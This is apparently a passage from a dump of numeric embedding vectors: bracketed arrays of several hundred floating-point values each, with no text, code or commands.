0.052798975,0.017227352,0.044916846,0.006371705,0.04408392,-0.01369567,0.009322647,0.11262844,-0.015226121,0.004901114,0.0112692155,0.009260638,0.014439109,-0.011411133,0.011533817,-0.013762796,0.028076012,0.0042455336,0.013628065,-0.0033101337,-0.013205259,0.05968893,0.07505659,-0.052014787,0.0069936393,0.037717156,-0.0016460846,0.016394095,0.015671365,-0.038630117,-0.023951873,-0.0048235278,0.051417273,-0.011372666,-0.026268255,-0.027322927,-0.08358343,-0.022708377,0.058578875,-0.0072029275,0.008760607,-0.0065488648,-0.015807195,0.005035772,-0.015610412,0.0034767862,-0.017721217,0.000023837572,-0.016983928,-0.015253493,0.005088822,0.0014418408,0.017968478,0.0015275828,0.0066038747,-0.0072713248,0.054999385,0.019527463,-0.058119603,0.065139346,0.0037953937,-0.07588539,-0.06661748,0.031111898,-0.058656573,-0.006813118,0.017864522,0.04102654,-0.03848828,0.0031998358,0.0026643581,-0.1022019,-0.024721889,0.022027122,-0.06337597,-0.017336583,-0.009435049,-0.060998358,0.043604027,0.0069849156,-0.058376864,0.046286188,0.013487944,-0.020887526,0.00488222,-0.031932358,-0.015560461,0.017207744,0.013350066,-0.041689556,0.038479164,0.01769033,0.009727619,0.028745856,0.053629875,-0.019877095,0.0039018893,-0.039960604,-0.027231472,-0.032230143,0.06461046,0.0051820697,-0.038633883,0.025203696,-0.06699599,0.015430093,-0.030546216,0.03562471,-0.021312239,-0.010142395,-0.044772148,0.009439344,-0.022211885,-0.046815727,0.0068168784,0.051851574,0.060990743,0.016135208,-0.009767698,0.018667337,0.011113342,0.024486361,0.07301535,-0.0072287,-0.06433539,-0.016025519,-0.04100214,0.0073334626,-0.02806457,0.036765587,-0.022732724,-0.07509207,-0.000009049265,0.025987508,-0.035440516,0.011038735,0.031477455,-0.048778713,-0.0038804095,-0.0005104782,-0.06985491,0.048187032,-0.018528936,-0.022682661,-0.01684811,0.011138229,-0.017124103,0.016875636,0.03478274,-0.026570482,-0.034349132,-0.006349997,-0.09248693,-0.014268943,0.026714252,0.04385374,-0.053823356,0.020652268,0.056064896,-0.020011753,0.0255172,-0.019252183,-0.0022954277,0.009594133,-0.010407036,-0.0064121936,-0.011217302,0.03192208,-0.023887122,0.030805035,0.011613404,0.026557896,-0.010438029,0.017895758,-0.018084956,0.021483842,-0.030803435,0.02158101,-0.0034852405,-0.01819244,-0.008502805,0.016155208,0.026120689,-0.06348825,0.019613115,-0.0839942,-0.005926999,-0.053999644,0.046779543,0.007802784,0.07985268,0.021270828,0.06265884,0.0372901,0.022591678,-0.0012467256,0.02418868,0.0016204863,-0.05264242,-0.01108609,-0.0011486802,0.015056174,-0.014559252,0.07045643,0.11186609,0.0064159743,-0.012227234,0.044822343,-0.029742433,0.055042386,-0.061290003,-0.07792666,-0.04765794,0.014603381,-0.05671295,-0.005636403,-0.0039831027,0.013844304,-0.015815033,-0.027326977,0.00013717767,-0.048529483,-0.02158245,0.016560383,0.0051510734,-0.015789373,-0.014981875,0.037159193,-0.008937667,0.057564035,0.039362155,-0.022534559,-0.040291153,0.022454632,0.0012596118,-0.0060684085,-0.021895673,0.020306338,-0.059292722,0.041430056,-0.008496736,-0.061916664,-0.036962725,-0.028228149,0.011836886,-0.025606852,-0.0064966786,0.01885802,0.04132375,-0.012129398,-0.008442818,-0.041761555,0.042680968,0.03964234,0.0072700186,0.02762148,0.06869471,0.015662476,-0.002801581,-0.034387074,0.019265128,-0.06982759,-0.01794468,-0.06673067,-0.03249857,-0.024842715,0.043424897,0.047542706,0.039754707,-0.021689454,-0.000018571765,-0.0015734727,0.008715256,0.012051079,0.021344008,-0.063651755,0.023504883,-0.0032425711,-0.018071065,-0.004156859,-0.0033617355,-0.01461046,0.01005288,-0.0022594363,0.004506048,-0.037290305,0.057342965,-0.015999889,-0.02900649,-0.07151613,-0.038430724,-0.039868418,-0.025125995,-0.02477797,-0.015539376,-0.021799782,-0.013921842,0.007169365,-0.04977125,-0.047996297,0.08419938,0.04355888,-0.07172766,0.0754073,-0.02493468,-0.042142812,0.021959418,-0.01070275,0.0046004322,0.025848327,0.021798678,0.05538299,-0.0089877155,-0.013216679,-0.028964734,0.0004384094,-0.012681868,-0.022021944,-0.043105863,-0.03588489,-0.038856287],[-0.0077275056,0.049812075,-0.17606959,-0.051902983,0.074584395,-0.08929418,0.044906914,-0.015101215,-0.055732388,-0.044611953,-0.035775993,0.026399491,0.05093209,0.03224885,-0.027438786,-0.044470955,-0.07303273,-0.011466306,-0.03725876,-0.039472964,0.030954624,-0.05325649,-0.0018337826,-0.022357587,0.111160316,0.08706384,0.029243585,-0.0046344777,-0.018194541,0.031226818,0.0112630455,-0.0036859314,-0.006747749,0.042429008,-0.10228336,-0.038995087,0.02066928,-0.010661176,0.013957479,0.054342587,0.049147777,-0.038632948,-0.04906414,-0.057946905,-0.007948209,-0.037913766,0.06299496,0.026959088,0.06670737,-0.06968242,-0.040450227,0.013238053,-0.0022441735,0.037930313,0.052580472,0.043865748,0.042257108,0.028612016,0.0043358663,-0.037211422,0.06930174,-0.011363126,-0.03489343,0.037956905,0.009152445,-0.042761132,-0.022918126,0.054731872,0.018230872,-0.0061863014,0.0029750834,0.008983149,0.042175744,0.0067038303,0.010380583,0.026513938,-0.021948542,-0.013267286,-0.00011811747,0.039436914,0.020944862,0.022613367,0.08948917,-0.0109284725,0.03873563,0.008039029,-0.018905051,-0.061660953,-0.008598118,0.027875321,0.017888123,0.04533075,0.017597029,0.02720947,-0.07494753,0.017922543,0.04286965,0.0040387195,-0.039403487,-0.04635665,-0.0037142823,0.027948225,0.03887865,-0.018083388,0.033693768,0.025510078,0.00086876657,0.009885181,-0.0041523525,-0.025317453,0.011638489,0.020243727,0.005256574,0.05242045,-0.018032357,-0.011699554,0.04386011,-0.011297638,-0.010165978,0.061505977,-0.0057338537,-0.025405284,-0.0017705052,0.009809688,0.02818706,0.032832414,-0.04314019,0.032728784,-0.022203987,-0.044988222,-0.015940364,-0.012504857,-0.010537264,0.025455346,0.0057513206,-0.0007229759,-0.06821711,-0.041373424,0.0008990684,-0.02067328,0.01493994,-0.010949951,0.010732469,-0.06393965,0.021315975,-0.038407076,0.0033463833,-0.055861887,-0.04381089,0.0059157927,0.006116117,0.0042346194,-0.040618993,-0.011891151,0.026866896,-0.033786014,-0.01776138,0.002486819,0.014617003,0.009694242,0.020156633,0.010703338,-0.07518169,0.0458313,-0.013157293,-0.04801555,0.010925662,0.054842863,-0.016262518,0.012540825,-0.08539166,-0.023687325,-0.048562836,-0.038469955,0.0017843937,0.038962886,0.02641303,0.009491446,0.069992445,0.010704583,0.020471383,-0.00015407706,0.050309002,-0.013879106,-0.05471245,-0.023349794,-0.043566246,-0.033105604,-0.023696475,-0.030034464,0.036935534,-0.014406496,-0.046631172,-0.0033129612,0.027408931,-0.020519888,0.038889375,0.021896312,0.012779459,-0.046897095,-0.048569452,-0.038271666,-0.031700723,0.00966792,-0.05583693,0.03658063,-0.014576387,0.059962347,-0.010343488,0.07172054,0.0469493,-0.060286827,0.0137997065,-0.018863905,-0.019828979,-0.024961578,0.012246437,-0.047576673,-0.025183199,-0.034277625,0.016295943,-0.05383307,0.025104586,-0.014594892,0.045384154,0.004894053,-0.031277917,-0.021339983,-0.025458204,-0.01281443,-0.056131475,-0.07025368,0.030317383,-0.017204631,-0.010983812,-0.0056210854,0.0096391365,0.10956829,-0.006012583,0.02303159,-0.004620165,0.030739548,-0.0038963188,0.01746365,-0.05820896,-0.0030724122,-0.04262782,-0.037840325,-0.041976936,0.04706737,-0.006095489,0.008298561,-0.0067934943,0.023886329,0.07989982,-0.043215595,-0.01639744,0.03627379,0.03683377,-0.01695261,-0.017464153,-0.012264658,0.046841014,-0.04315237,0.0147070475,-0.067804955,-0.03695603,-0.011967021,0.043354563,0.010480953,0.040502764,0.009434353,0.016464997,0.028351199,0.029161002,-0.006743966,0.020062815,0.04089184,-0.05239327,0.019266369,-0.018383265,-0.015817102,-0.005644467,0.02662797,-0.011048661,-0.01688969,0.044188023,-0.0025560358,0.046549324,-0.011165362,0.05108349,-0.05743254,0.011939834,0.012240616,-0.0029252425,-0.036740176,0.028552217,-0.019742236,0.04117507,-0.00084156997,0.025303405,0.033857945,0.052941915,0.04148337,-0.009868834,0.00078149297,0.005026611,-0.0016977724,0.037425205,-0.03533102,-0.02902713,-0.015378168,-0.0061240746,0.016180096,-0.011427373,0.061762318,0.06877802,0.021208882,0.0177938,-0.02431977,0.0063764593,-0.07945579,0.027836848,-0.026799431,0.0024112288,0.046517666,0.0016630895,0.053926725,-0.0068835714,-0.026054464,-0.047206588,-0.024744464,0.041611664,-0.03559144,-0.0051778955,0.021736635,0.0049731205,-0.038066458,-0.03612187,0.05701261,0.007887079,0.014490284,0.008719449,-0.045303274,0.009666724,0.009644036,-0.08917029,-0.0033799508,0.028559644,0.046591956,-0.03120754,0.0052374825,-0.004322437,-0.015945448,0.00035820206,-0.044815563,0.032617018,0.008242934,0.015371393,0.020002501,0.04143591,0.03165611,-0.021640627,-0.005264625,-0.0066175894,0.055916477,0.0455055,0.040555257,-0.029362148,0.029171059,0.008298121,-0.020931056,-0.03855882,0.011583157,-0.024530957,0.007326711,-0.04955732,0.028250016,0.010220418,0.056833833,0.013312214,-0.05153565,0.043813366,-0.0013685616,0.01498694,0.004780811,0.014179765,-0.0010920678,-0.0070138085,0.04959544,-0.018098952,-0.03236884,-0.04570855,-0.030047396,0.026416274,-0.030076383,0.027579362,0.017397262,0.010673103,0.058610603,-0.03644281,-0.032729294,0.024793942,0.038212124,0.022472061,-0.0154713625,-0.04215036,-0.01628968,0.07216193,0.037613288,0.024707107,0.039848804,0.049823698,-0.06356317,-0.000040046343,0.019763561,0.07019387,-0.027004145,-0.036974188,-0.0296617,0.032233797,0.015310854,0.019299326,-0.031862326,-0.0074961875,0.009050439,0.055821758,0.05279648,0.022399124,-0.058233514,-0.0044833045,0.017862208,0.029236175,0.019629914,-0.046613682,-0.060785614,0.060906366,0.052872073,0.015365326,-0.006066371,-0.0001159721,0.0015252988,-0.044083387,-0.039266318,0.018009001,0.07072014,0.10203383,-0.041483603,-0.073151834,0.08067138,0.0116190445,0.022062108,0.005732243,0.0281179,0.08692683,-0.010929231,0.009969039,-0.020284805,0.01982051,-0.011537921,0.0007398055,0.004770062,-0.057421647,0.020865826,0.03387909,-0.038240857,-0.000498313,-0.03396094,0.029312257,0.039239302,-0.014236754,-0.026735803,0.047800016,-0.018998371,0.012642618,-0.004773158,0.031033117,0.043397713,-0.03149034,0.052366924,-0.009781268,-0.043909285,-0.03895756,-0.07263287,0.008652272,0.04809751,0.046297804,-0.01198801,-0.006537143,0.023300158,-0.003295371,-0.038389005,-0.016268075,0.027926829,-0.0326057,-0.03400441,-0.044675983,-0.0022334852,0.018360583,-0.04184049,0.021907527,0.0780546,-0.044172835,0.013045488,0.04424389,-0.010501422,0.013114158,-0.029761916,-0.044395577,-0.053143144,0.025216404,0.02679343,-0.0023959037,-0.0134070525,0.021570712,-0.042484496,-0.0009148709,-0.033932313,-0.024871029,0.040876474,0.025540838,-0.005337629,-0.012196156,-0.025106417,-0.053066712,0.010107602,-0.03158928,-0.03196651,0.08215819,-0.0067339805,0.02741067,-0.036411494,-0.06670429,-0.04493887,0.024273409,-0.01825008,0.011304352,0.03130207,0.023638139,0.047217403,0.03840695,-0.0065063247,0.0089042755,-0.006956618,-0.023781793,-0.011040419,-0.016866472,0.05407156,-0.014432571,-0.019374957,0.048586182,-0.07029835,0.019132236,-0.024967365,-0.016825192,-0.017809102,-0.034092173,0.004628313,-0.016254675,-0.007329445,-0.03399423,0.023540068,0.0037472525,-0.0043394538,-0.023742773,-0.039083283,-0.009293384,0.09063075,-0.015378624,0.026317976,0.009888997,-0.029386466,0.0013054631,-0.021544453,0.0070566125,-0.0060579064,0.04118379,0.00802069,-0.048807435,-0.09148329,-0.021191586,-0.049475733,0.018944658,0.023791706,-0.0338873,0.012885522,-0.023108264,-0.030744465,0.008613492,-0.008357468,-0.021784592,0.029026965,0.017420433,0.0059043444,-0.019234227,0.04645831,-0.015737994,0.04151564,-0.017407374,-0.037488177,0.00046416436,-0.012647084,0.06671102,-0.020186616,0.006458353,0.0893723,-0.019386446,0.005081924,-0.051539555,-0.037115976,0.018572161,0.0092518525,0.022126613,-0.0065868637,0.02589348,-0.012221757,0.021022445,0.009796646,0.01609975,-0.012112607,-0.022503661,-0.07004885,0.025754916,-0.020198531,0.07216457,-0.0030816928,-0.016221901,-0.061947625,0.0038362916,0.05048915,-0.031980287,0.02937942,-0.056256235,-0.05883206,-0.09801083,-0.020456176,-0.004205901,-0.013998133,0.047575478,0.055285122,0.03038321,-0.0338653,0.011426583,-0.014178779,0.061975546,-0.038830426,0.0057795085,-0.008620243,0.06623378,0.007944167,0.05614137,0.08829752,0.010374967,-0.0048323846,-0.0054067173,-0.027198395,0.027921768,-0.011442368,-0.039635614,-0.0071705496,-0.042454198,0.007925505,-0.03326549,0.033144392,0.0130622005,-0.030713629,0.012776227,0.022079375,-0.05353618,-0.072028026,0.0029430166,0.029323664,0.019753968,0.019816881,-0.016227366,-0.008255653,0.03801141,0.013402268,-0.033146944,-0.0039777523,0.012109247,-0.037088174,0.040345162,-0.009877493,0.044948827,-0.030064043,-0.017982122,-0.021772197,-0.010551507,-0.02951859,0.0014685133,-0.053256508,0.0029850523,-0.067939,-0.019543616,0.073697515,0.015560487,-0.03750511,-0.045055557,0.054678783,0.022634836,0.021324527,0.0046204063,-0.0060430695,-0.031062674,0.009759417,-0.0056722267,0.018395841,0.016407546,-0.024243776,-0.05523365,0.026222352,-0.045310553,0.05364255,-0.042596545,0.06159849,0.04195402,-0.020699538,-0.011854498,0.04071827,0.044829875,0.032694593,-0.037247065,0.02232136,-0.033718437,0.015698655,0.04229863,0.0058512553,0.047634285,0.012083528,-0.031618938,-0.042678397,-0.058781583,0.04416153,0.029039226,-0.014638614,-0.019991415,-0.029770257,-0.05006936,-0.050140057,-0.029325569,0.03717887,0.003414089,0.015084636,-0.02223681,0.017240614,-0.030072218,0.056145057,0.031077892,-0.029213354,-0.0024054782,0.010138186,0.01126375,0.05012314,-0.0022818972,0.036737226,0.023996346,0.0027433697,0.09546673,0.024845418,0.032751013,-0.00035298103,-0.04435048,0.043758377,0.02368206,-0.026618203,-0.028223282,-0.03662338],[0.02509126,0.023864545,-0.16142344,-0.026968582,0.093517244,-0.035472512,-0.012948488,0.0014458456,-0.023548093,-0.047292728,-0.0033538158,0.057984266,0.04623986,0.005745025,-0.023216454,-0.047485255,0.013767023,-0.033552006,-0.0066960696,-0.015404786,0.029226743,-0.063053705,0.014268873,-0.06520521,0.11212366,0.04589671,0.053839967,0.011143621,-0.01007472,-0.017866546,0.004221151,-0.053820327,-0.050101936,0.017384417,-0.09089473,-0.08315372,0.03382946,0.003968208,-0.047978625,0.035461724,0.014042204,-0.0063388776,-0.003682829,-0.057414506,0.00009050319,-0.008813126,0.023525959,-0.0034057728,0.034751717,-0.11575908,-0.0047773295,0.0075640213,-0.01683673,-0.0134392725,0.06761806,-0.013281021,0.03871147,0.0005298286,-0.04399502,-0.034298245,0.08898317,0.03340451,-0.025508888,0.04560521,0.014630495,0.03656725,-0.021305822,0.02961182,0.033484664,-0.019512666,0.0050903484,-0.05066451,-0.013905061,-0.024429517,-0.030067073,0.003823009,-0.021724865,-0.0813851,0.012062125,0.06970551,-0.002800568,-0.019276477,0.052369017,-0.015977789,-0.0068256264,0.016334083,-0.017514694,-0.04519644,-0.004990707,0.0431718,0.009901941,0.013093504,-0.020404927,0.01681438,-0.05083888,0.023965057,0.030903976,0.031759866,-0.03131953,-0.027312068,-0.040248208,0.0056946296,0.032195933,-0.009113762,0.02103183,0.0600673,-0.017220937,-0.01817914,0.04037841,0.0052208607,0.007623973,0.034436475,0.014722866,-0.03536703,0.07231249,-0.011258673,0.051214702,-0.020025104,-0.0018173868,0.07249154,-0.01758656,-0.037723936,0.0036264085,0.0572505,0.013597143,0.036079668,-0.023804106,0.051455,-0.013703223,-0.03900707,0.0012507716,-0.007124294,-0.033959087,0.0011226037,0.0313215,0.020503089,-0.06784216,-0.056542255,0.05895454,-0.008960057,0.031202905,0.014674665,0.01847966,-0.022782391,-0.0389088,-0.025818886,-0.007338478,-0.022842152,-0.051376835,0.013707365,-0.040044665,0.035828315,-0.012445964,0.016769154,0.016820818,-0.006664093,-0.02102156,-0.008089496,0.010514205,0.059584454,-0.017415566,0.015649369,-0.047043547,0.029770253,-0.0279789,-0.045618575,0.010134519,0.12627995,0.004189972,0.0050622043,-0.057573136,0.0066037606,-0.034593277,-0.011306939,-0.008542949,0.015220556,0.020649973,-0.037493475,0.03517748,-0.04765965,0.022106852,-0.056729715,0.061690032,-0.02585936,-0.04427254,0.003504255,0.02865554,-0.0453229,-0.015693743,-0.021513402,0.0037724266,-0.010396984,-0.042910084,-0.005292567,-0.027022345,-0.060868464,0.02009649,0.015619725,0.04178507,0.026763266,-0.06017852,-0.003939844,-0.030332772,-0.028105685,-0.035192546,0.03734417,-0.0017915552,0.015095535,0.011582158,0.045506373,0.056289997,-0.039200943,-0.010632281,-0.00486018,0.016387615,-0.04726018,0.005434845,-0.05341442,-0.057396837,0.004708595,0.016576782,-0.019576402,0.057287324,0.0030403323,0.042946152,0.019395377,-0.023604108,0.018259538,-0.027654493,0.007218906,-0.043755822,-0.08865065,0.048882905,0.030021477,-0.00804331,0.034487773,0.023609284,0.09301462,0.0051917527,0.010597918,-0.0081118345,0.02472961,-0.0323989,0.0005721637,-0.028784052,0.027228318,-0.017797597,-0.0071637337,-0.05719142,0.022774022,-0.023722688,0.013762441,0.013223364,0.024676658,0.07461899,-0.07266256,-0.0120728,0.01877603,-0.0022077837,-0.030417029,-0.00784448,-0.061661106,-0.033701718,-0.053763527,0.010503736,-0.038900055,-0.061166022,0.015510918,0.04188799,0.011211054,0.04639252,0.033325396,0.08104077,0.040096406,-0.0007962745,-0.01259385,0.051328424,-0.020519383,-0.017436046,0.0060969167,-0.061124913,-0.015497885,-0.0071514077,-0.0048858984,-0.014477455,-0.010912037,0.025167199,0.0102517735,0.010396313,-0.044277653,0.07181234,-0.058994073,-0.015156327,0.030694801,-0.015636582,-0.02561122,0.025709638,-0.012661599,0.030245291,-0.028255265,0.018922996,0.046888154,0.009991094,0.05403995,0.0002797203,-0.022974603,0.014293342,0.017114455,0.025837002,-0.009659175,-0.010014642,0.017946523,0.0034203639,0.009014157,-0.03515599,0.010407927,0.042004835,0.010756219,-0.009028511,0.0106812,-0.010569187,-0.049383607,0.021223558,-0.027838444,-0.037889887,0.04683946,-0.008764666,0.029553656,0.014139742,-0.05307273,-0.0000596076,0.033785533,0.06709036,-0.043794777,-0.071134105,0.021066569,0.06268943,0.030312145,0.0004146426,0.044875298,0.012524041,-0.03057903,0.010564723,-0.023534834,-0.01823329,0.018208602,-0.011252614,0.0002892063,0.0059326845,0.050670993,-0.03110147,0.04274607,-0.041786868,0.014478383,0.004921166,-0.030938288,0.010404913,0.012377716,0.012305682,-0.002791917,0.060623996,0.013886559,0.019780638,0.022425782,0.024729474,0.024895258,0.048628587,-0.0069537265,-0.019590467,0.009241281,-0.040718216,0.008725066,0.025313811,0.0332461,0.0022842514,0.013109911,-0.065683685,0.02473133,-0.0017803537,0.026624348,0.0014947254,-0.073209025,0.02054621,0.023288934,0.029561482,-0.0078096394,0.03876081,-0.0027390232,0.0054636993,0.008498857,0.014760462,-0.04913096,-0.012433016,0.032736897,0.003500544,-0.026093217,0.034283865,0.0048480732,-0.027202044,0.04547983,-0.046123147,-0.08076057,0.03885849,0.024277989,0.019859549,0.007587377,-0.01807489,-0.0061297044,0.07609555,0.009553975,0.06352661,-0.0053165625,0.0068860995,-0.057546996,0.02452749,0.031557713,0.040641785,0.028586654,0.009112254,-0.016217384,0.0007946795,0.04205753,0.0009884126,-0.02579108,-0.0039500147,0.02803712,0.023458103,0.07130891,0.0015944183,-0.04807798,-0.000026204723,0.042364,0.029870901,0.003268021,0.025839616,-0.033468787,0.024816731,0.03533881,-0.018263813,0.033263803,0.011436982,-0.016666126,-0.08314741,-0.06072352,0.0009573619,0.08370263,0.09516881,-0.057782765,-0.010656737,0.055227347,0.008985091,0.0136079015,0.02825207,-0.008825711,0.08470024,-0.025029192,0.008022075,-0.06536788,0.011808771,-0.018499982,-0.010800495,0.01654767,-0.06794118,-0.0035437357,0.03706307,0.060141098,0.0034779424,-0.028180616,0.036127687,0.087134644,-0.051930152,-0.0034732397,0.0017399386,-0.033126693,0.057773218,-0.0011823728,-0.0033869734,0.009938514,-0.03517787,0.039795365,0.015190601,-0.03488298,-0.041212667,-0.077822015,-0.049313594,0.04451485,-0.0025500916,0.007101504,-0.027030956,-0.017338065,0.0043839356,0.010317094,0.018699812,0.0131520275,0.0059721586,-0.048014257,-0.027004104,-0.018013164,-0.02450687,-0.03006978,0.040308684,0.03624882,-0.03539133,0.023332737,0.05000005,-0.03582008,0.04561606,-0.024797639,-0.040603094,-0.061688073,0.007853668,-0.024753153,0.04828051,-0.008699802,0.040081754,-0.03201195,0.027792903,-0.012942235,-0.07382125,0.0191968,0.024844036,-0.018684776,-0.0014414701,0.011175182,-0.0027673491,-0.005195002,0.017074987,0.0032078954,0.031947672,-0.028543603,0.026286671,-0.024983734,-0.079130575,-0.022507394,0.053512596,-0.041969113,-0.020552984,0.030604374,0.02905925,-0.014001292,0.008158586,0.015378366,0.043091636,-0.0097329505,-0.010367698,-0.043837193,0.0078445,0.071126856,-0.0077923443,-0.07457726,0.047684807,-0.07643543,0.015922446,-0.030104194,0.021152057,0.012061735,-0.012751462,0.008251132,-0.009377028,-0.025359992,0.0059443973,-0.029653827,0.04878661,0.036594987,0.0029923515,-0.045874048,-0.023557551,0.043812413,0.020059042,0.051937114,-0.02270198,-0.020664643,-0.061604258,-0.02580521,-0.0072147558,0.0034751398,0.013786754,0.024818746,-0.051419653,-0.033417918,0.028319899,-0.038535003,0.028577419,0.03720449,-0.021428559,0.012013958,-0.04469551,-0.09334334,0.043046832,-0.026336327,-0.028099917,-0.002810135,0.032837577,0.028474825,0.009119003,0.070280306,0.00962783,0.008996582,-0.029123947,-0.050571658,-0.006326144,0.008457915,0.02577217,0.00033048893,-0.012862085,0.030236835,-0.0014018315,-0.00013361855,-0.004981249,-0.028008569,0.046579733,-0.0056657237,-0.008940967,-0.0136902165,0.0005289062,-0.045093566,0.034277044,-0.0057182745,-0.005150936,0.027370643,0.016967276,-0.029145887,0.03437387,-0.01136578,0.043282505,-0.020338008,0.014650097,-0.038400542,-0.02312346,0.024465017,-0.053905066,0.048711702,-0.035939228,-0.055897657,-0.0935968,0.027467757,-0.018479502,0.04115588,-0.0054553575,0.021921987,0.06787879,-0.012182969,0.012466071,-0.00076695054,-0.006305854,-0.032826442,0.003406864,0.017037379,0.05401781,0.019448588,0.06120595,0.079818934,0.014630279,0.0011667514,0.05536623,-0.03365962,-0.007886252,-0.025940865,-0.07200841,-0.028529942,0.02046579,-0.008330893,-0.026742548,-0.030550366,0.014870435,-0.0117506925,0.0051523433,-0.019046402,-0.07611809,-0.053150933,0.036725845,0.041165505,0.022710605,-0.023858063,0.038727745,0.021132324,0.09082818,0.019923033,-0.019983938,-0.005839695,0.01180018,-0.01853152,0.038381338,-0.017347224,0.011110464,-0.054243863,0.008744468,0.000991529,-0.057317756,-0.03289365,0.022489982,-0.040810354,-0.005772125,-0.043554448,-0.003844271,0.028180536,-0.029372789,-0.044391975,-0.06795506,0.09899614,-0.011696272,0.020154448,0.034858637,0.045861516,0.014860467,0.01041091,-0.008543671,0.0021560765,-0.008953374,-0.018181834,-0.058515448,-0.00005950339,-0.032151632,0.02960826,-0.008153737,-0.005459547,0.019932551,-0.009207418,0.019429008,0.044952665,0.056286167,-0.014272911,-0.009313843,0.043183368,-0.004292235,0.020183334,0.045875624,-0.01106042,0.056330867,-0.03555399,-0.019277537,-0.022644138,-0.02221743,0.01441867,-0.006243744,0.0050993906,-0.03279198,-0.03886574,-0.05476556,-0.012140424,-0.0021150997,0.035986852,-0.036133498,0.031529203,0.00703789,0.00315942,-0.03357102,0.004689911,0.02963553,-0.0705114,0.084184,0.008171746,-0.0071225353,0.06327193,0.005699903,-0.0131258825,0.035488203,-0.01797145,0.09003781,0.018058818,0.05302705,-0.05218794,-0.0015690209,0.031953644,-0.031865824,-0.08603976,-0.008544122,-0.024984598],[0.060800448,0.0325044,-0.16318442,-0.012685122,0.053653274,-0.08005735,0.01949783,0.057198174,0.014914491,-0.05463039,-0.016471362,0.016118733,0.048140988,-0.018724518,0.014129486,-0.00014705797,-0.01532799,-0.024678133,-0.029657628,-0.01723367,-0.013464971,-0.06087115,0.0030021889,0.015518246,0.042804472,0.038556784,-0.029069964,0.03646107,-0.00095394487,0.009922852,0.023620015,-0.01828966,-0.04408016,0.015353381,-0.077809185,-0.09295768,-0.0003750278,-0.02773987,-0.04103106,0.06964025,0.019005114,-0.006505667,0.02526954,-0.046303857,0.04276177,-0.033812232,0.05218967,0.01063933,0.09855881,-0.12937436,0.0070356005,-0.008507549,0.021363132,-0.035983562,0.06830881,-0.02218643,-0.011437243,-0.0049705245,0.008043294,-0.052828357,0.065009065,0.052069843,-0.0076507423,0.03416133,0.039246168,-0.010966881,-0.015521935,-0.0069318316,0.03208702,-0.031990275,0.06109571,0.015839297,0.014026636,0.016101895,-0.079090394,-0.010442887,-0.024418067,-0.075710736,-0.04767599,0.030482126,0.03723019,-0.007280899,0.0594956,0.0038683484,0.01648031,-0.021145908,-0.007771575,0.010504889,-0.0044648754,-0.008828305,-0.011750582,0.024689384,0.047237244,0.06488083,-0.08458692,0.0046541835,0.04321283,0.027399186,-0.0126726,-0.02910432,-0.06298532,-0.026107023,0.0130775,-0.010628291,-0.00919138,0.06512533,-0.011708785,0.0061251046,0.020889664,0.034808237,0.0038070416,0.01206807,0.025864886,-0.020345524,0.0075555984,-0.023050083,0.04845565,-0.014975462,-0.0016506821,0.025686339,0.0010915118,0.0023615542,-0.016019218,0.073257126,0.05964896,0.05796396,-0.033851847,0.02158261,0.005215679,-0.042843416,-0.021962,-0.009310767,-0.054898493,0.04713121,0.030531283,0.041949023,-0.031926516,-0.017583247,0.025364092,-0.030722093,0.021342617,0.006592731,-0.0049337856,-0.0041519986,0.004469651,-0.016393926,0.007541759,0.008568728,-0.07265101,0.046641696,-0.042581636,-0.00420609,-0.014405799,0.0042601353,0.018469324,-0.04723038,-0.005626928,0.0148570435,0.046749078,0.048562057,-0.001654483,0.023396362,-0.020100543,0.082829446,-0.047479145,-0.016117802,0.038016442,0.06694571,0.009709254,0.014191334,-0.057401564,-0.027854044,0.013588728,-0.035066906,0.0044242926,-0.011455142,0.04440593,-0.05001845,0.0078027905,-0.020919852,0.011941873,-0.063240334,0.047177196,-0.00091878,0.0022428238,-0.00069723814,0.0061820215,-0.059149716,0.012289824,-0.01108898,0.05496546,-0.002499813,-0.0639903,0.0058694836,-0.039622266,-0.036898844,0.023746561,-0.022031741,0.011336487,-0.001348929,-0.033129264,-0.004516281,-0.025857428,-0.03215363,-0.047719426,-0.0068716584,0.017108835,0.034943607,-0.018860403,0.04614701,0.06940041,-0.067785405,0.020641841,-0.0066296174,0.0066981316,-0.04260675,-0.030972537,-0.02869125,-0.051400002,0.011846298,0.06806863,-0.025161177,0.0011504601,-0.010889679,0.04220109,-0.0033242865,-0.03205903,0.031991336,0.022032449,-0.014620541,-0.039848436,-0.09946311,0.006142256,0.014443665,0.06051963,0.028376358,-0.007683145,0.04253352,-0.004060853,0.056975853,0.01345579,0.030309586,-0.029368917,0.022946414,-0.00844579,0.011278012,-0.026772967,-0.023057587,0.026000815,0.013009583,-0.0036344028,0.029070664,0.0272989,0.038068876,0.022441931,-0.033287283,-0.043813772,0.030534737,0.008449573,-0.0033762052,-0.036316138,0.005994628,0.010876119,-0.044003114,-0.010479151,-0.055498667,-0.0369341,-0.041461036,0.00002550532,-0.00091642415,-0.0074065067,0.012092421,0.061784796,0.04987768,-0.02507003,0.02186101,0.022394253,0.007273779,-0.039035715,-0.026389265,-0.046655137,-0.04447561,-0.02872672,0.04352149,-0.024043955,-0.017662708,-0.009666038,-0.03733478,0.0018267398,-0.05066119,0.030605903,-0.04265249,-0.003277946,0.042859443,-0.008748892,0.004015599,0.0404738,0.0036199032,0.025143845,0.012197078,0.06805559,0.038998615,0.02995611,0.050991092,-0.008789257,-0.025902862,0.03130465,-0.033459377,0.0004812708,0.012385199,-0.07080241,0.009598113,0.019883746,0.060286704,0.0015225759,0.047252197,0.04653552,0.0045716194,0.064059556,-0.0017976592,-0.0028811349,-0.07712626,-0.039778847,-0.059759613,-0.024098763,0.023311155,-0.023332732,0.020583915,-0.009828981,-0.048475012,-0.003485515,0.0017516853,0.03954632,-0.080795705,-0.0068190726,0.043975074,0.00868709,0.02847826,-0.020496454,-0.009382005,0.024293143,0.00543542,0.009339144,-0.014349037,-0.019098002,0.030643908,-0.06268115,0.061706718,0.03540235,0.04691298,-0.044675376,-0.019562425,-0.010416843,-0.00055016327,-0.008349427,0.009947097,0.033351853,-0.011195108,0.023758665,-0.030169602,0.041280776,-0.0057877265,-0.014839562,-0.0048377183,-0.022350127,0.04455729,0.07050034,-0.015259673,-0.011547323,-0.0049743787,0.015104568,-0.014085854,0.029441243,0.030265892,-0.026653817,-0.0030712085,-0.08357849,0.01971214,-0.028497785,0.01326416,0.015391581,-0.061756127,0.014318599,0.07169351,0.031581964,-0.026930053,0.03408655,-0.038391903,-0.024013933,0.0066744545,-0.0023239625,-0.0505828,-0.046119113,-0.021510825,0.018467167,-0.008948397,0.013226452,0.0052975267,0.019741839,0.037445772,-0.059359394,-0.056112207,0.03362568,0.051096126,-0.026624179,-0.01129966